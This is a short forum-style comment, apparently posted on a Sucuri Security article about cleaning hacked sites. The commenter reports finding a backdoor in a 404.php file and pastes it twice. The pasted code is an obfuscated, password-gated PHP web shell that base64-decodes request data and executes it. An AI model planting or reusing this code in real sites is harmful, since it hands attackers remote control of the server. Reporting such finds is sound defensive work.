W. Andrew Loe III
1p
1 comments posted · 0 followers · following 0
14 years ago @ Sucuri Security - Understanding and clea... · 0 replies · +2 points
I've seen a backdoor in 404.php
Looks like:
<?php /*xyz*/ $mar = 'archo'; $a =
'm'.'d5';if($a($_REQUEST[$a])=='698357e86842'.'1222bcf89349bd5cf34d'){$w
= 'Cdbl0sYoWOiyJt3qtqyOoqxA';$x = $_REQUEST[$w];$y = 'base'.'6';$y.=
'4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';$z.= 'unction';$x =
$z('',$x);$x();} /*xyz*/ ?>
Looks like:
<?php /*xyz*/ $mar = 'archo'; $a =
'm'.'d5';if($a($_REQUEST[$a])=='698357e86842'.'1222bcf89349bd5cf34d'){$w
= 'Cdbl0sYoWOiyJt3qtqyOoqxA';$x = $_REQUEST[$w];$y = 'base'.'6';$y.=
'4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';$z.= 'unction';$x =
$z('',$x);$x();} /*xyz*/ ?>